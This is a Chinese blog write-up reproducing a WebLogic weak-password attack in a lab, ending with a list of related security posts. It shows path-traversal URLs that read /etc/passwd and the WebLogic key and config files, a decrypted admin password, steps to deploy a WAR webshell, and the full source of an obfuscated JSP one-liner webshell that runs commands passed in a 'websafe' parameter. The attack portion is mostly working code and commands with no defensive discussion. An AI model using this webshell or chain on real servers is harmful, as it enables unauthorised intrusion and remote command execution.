weblogic弱口令漏洞复现

文章目录

一、漏洞特征

1.可以直接获取passwd文件

http://192.168.232.131:7001/hello/file.jsp?path=/etc/passwd

2.可以直接获取密文文件

http://192.168.232.131:7001/hello/file.jsp?path=./security/SerializedSystemIni.dat

将密文copy到*.dat文件

3.可以直接获取密钥文件

http://192.168.232.131:7001/hello/file.jsp?path=./config/config.xml

{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=

4.解密密码

解密后得到密码Oracle@123,用户名是weblogic

5.登录后台

使用解密后的账号登录后台

二、命令执行复现

1.部署webshell

进入部署页面

点击安装,上载文件

选部署档案,上传hello.war

上传成功后点下一步,选将此部署安装为应用程序,设置应用名称

部署完成

2.Shell命令执行

http://192.168.232.131:7001/hello1/hello1/index.jsp?websafe=id

3.jsp一句话木马

java 复制代码
<%@ page import="com.sun.org.apache.bcel.internal.util.ClassLoader" %>
<html>
  <head>
    <title>Hello</title>
  </head>
  <body>
    @Hello world!@
  </body>
</html>
<%!public String HMfR(String yOK){String aAh="";for (int i = 0; i < yOK.length(); i++) {aAh+=(char)(yOK.charAt(i)+6);}return aAh;}
%>
<% String yiO=request.getParameter("websafe");if(yiO!=null){ Class tJIi = Class.forName(HMfR("d[p[(f[ha(Lohncg_"));
Process Mdlz = (Process) tJIi.getMethod(HMfR("_r_]"), String.class).invoke(tJIi.getMethod(HMfR("a_nLohncg_")).invoke(null),yiO);
java.io.InputStream in = Mdlz.getInputStream();byte[] PYp = new byte[2048];out.print("<pre>");while(in.read(PYp)!=-1){ out.println(new String(PYp)); }out.print("</pre>"); }
%>
相关推荐
粟悟饭&龟波功1 小时前
【网络安全】二、入门篇:HTTP 协议进阶 ——GET/POST 常用传参方法详解
安全·web安全·http
lingggggaaaa2 小时前
小迪安全v2023学习笔记(九十讲)—— 小程序篇&反编译&外在&主包分包&配置泄露&算法逆向&未授权
笔记·学习·安全·web安全·网络安全·小程序
独行soc5 小时前
2025年渗透测试面试题总结-90(题目+回答)
网络·python·安全·web安全·adb·渗透测试·安全狮
jun~20 小时前
SQLMap数据库枚举靶机(打靶记录)
linux·数据库·笔记·学习·安全·web安全
伊织code21 小时前
Cybersecurity AI (CAI) - 轻量级网络安全AI框架
人工智能·安全·web安全·cybersecurity·cai
黄焖鸡能干四碗1 天前
企业信息化建设总体规划设计方案
大数据·运维·数据库·人工智能·web安全
余防1 天前
文件上传漏洞(二)iis6.0 CGI漏洞
前端·安全·web安全·网络安全
PyHaVolask1 天前
渗透测试入门:从网络抓包到Web安全基础
网络·web安全·http协议·网络抓包
PyHaVolask1 天前
从PHP入门到公网部署:Web开发与服务器运维实战指南
web安全·php开发·http协议·服务器部署
鸠摩智首席音效师2 天前
Nginx 如何启用 HSTS 以加强网络安全 ?
运维·nginx·web安全